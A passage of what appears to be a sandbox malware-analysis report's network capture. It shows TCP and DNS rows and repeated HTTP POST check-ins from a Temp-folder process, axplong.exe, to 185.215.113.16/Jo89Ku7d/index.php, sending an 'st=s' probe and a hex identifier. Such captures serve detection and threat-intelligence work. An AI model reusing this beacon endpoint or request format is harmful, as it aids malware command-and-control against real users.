Sep 27, 2024 19:06:07.870202065 CEST	80	62817	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:07.870280981 CEST	62816	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.870304108 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.870531082 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:07.875282049 CEST	80	62817	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:08.576803923 CEST	80	62817	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:08.576864958 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.683619976 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.683954000 CEST	62818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.688884020 CEST	80	62818	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:08.689321995 CEST	80	62817	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:08.689408064 CEST	62817	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.689450026 CEST	62818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.689546108 CEST	62818	80	192.168.2.4	185.215.113.16
Sep 27, 2024 19:06:08.694675922 CEST	80	62818	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:09.412343979 CEST	80	62818	185.215.113.16	192.168.2.4
Sep 27, 2024 19:06:09.412664890 CEST	62818	80	192.168.2.4	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 19:04:35.501840115 CEST	53	52833	162.159.36.2	192.168.2.4
Sep 27, 2024 19:04:36.026990891 CEST	57972	53	192.168.2.4	1.1.1.1
Sep 27, 2024 19:04:36.034615040 CEST	53	57972	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 27, 2024 19:04:36.026990891 CEST	192.168.2.4	1.1.1.1	0x8889	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 27, 2024 19:04:36.034615040 CEST	1.1.1.1	192.168.2.4	0x8889	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62759	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:03.279798985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:04.634599924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:04.635782957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:04.637388945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:04.637726068 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:04.879264116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62760	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:04.999316931 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:05.719552994 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:05.720820904 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:05.949501038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62761	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:06.062747955 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:06.773173094 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:06.774979115 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:07.005067110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62762	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:07.124454021 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:07.845071077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:07.845870972 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:08.076653004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62763	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:08.272320986 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:08.993936062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:08.994999886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:09.317238092 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62764	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:09.437510967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:10.163738012 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:10.164438963 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:10.399038076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62765	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:10.517086029 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:11.242234945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:11.376559973 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:11.606090069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62766	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:11.719474077 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:12.437840939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:12.440521002 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:12.671224117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62767	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:12.780961990 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:13.480228901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:13.480870962 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:13.704843998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62768	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:13.812005043 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:14.511718988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:14.512782097 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:14.739614010 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62769	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:14.858547926 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:15.617336988 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:15.618117094 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:15.846216917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62770	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:15.971127033 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
